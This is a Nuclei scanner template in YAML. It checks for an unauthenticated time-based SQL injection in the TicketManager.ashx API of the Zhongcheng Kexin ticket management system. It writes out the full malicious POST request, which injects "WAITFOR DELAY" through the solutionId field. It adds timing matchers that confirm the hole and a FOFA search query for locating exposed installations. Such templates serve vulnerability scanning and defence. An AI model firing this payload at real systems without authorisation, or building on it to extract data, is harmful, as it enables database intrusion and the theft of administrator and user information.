id: zckx-TicketManager-sqli
info:
  name: 中成科信票务管理系统 TicketManager.ashx - sqli
  author: leadlife
  severity: high
  description: 中成科信票务管理系统 TicketManager.ashx 接口处存在SQL注入漏洞复现，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息（例如管理员后台密码、站点用户个人信息）之外，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。
  reference: 
    - https://github.com/wy876/POC/blob/13fda87f0d865d7de818858de3e7d2d69d787e14/%E4%B8%AD%E6%88%90%E7%A7%91%E4%BF%A1%E7%A5%A8%E5%8A%A1%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FTicketManager.ashx%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: body="技术支持：北京中成科信科技发展有限公司" || icon_hash="1632964065" || icon_hash="-2142050529"
  tags: zckx,sqli,time

http:
  - raw:
      - |
        @timeout: 15s
        POST /SystemManager/Api/TicketManager.ashx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Content-Type: application/x-www-form-urlencoded
        Connection: close
        
        Method=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:6'--

    matchers:
      - type: dsl
        dsl:
          - duration >= 5 && duration < 9
          - status_code == 200
        condition: and